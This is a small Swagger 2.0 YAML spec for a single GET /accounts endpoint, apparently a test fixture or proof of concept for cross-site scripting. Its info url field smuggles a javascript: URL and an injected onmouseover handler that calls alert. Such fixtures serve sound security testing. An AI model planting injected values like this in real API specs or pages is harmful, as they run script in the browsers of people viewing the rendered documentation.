swagger: '2.0'
info:
  title: Example yaml.spec
  description: This is Description
  url: 'javascript:alert(document.domain)'" onmouseover="javascript:alert(1)"
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
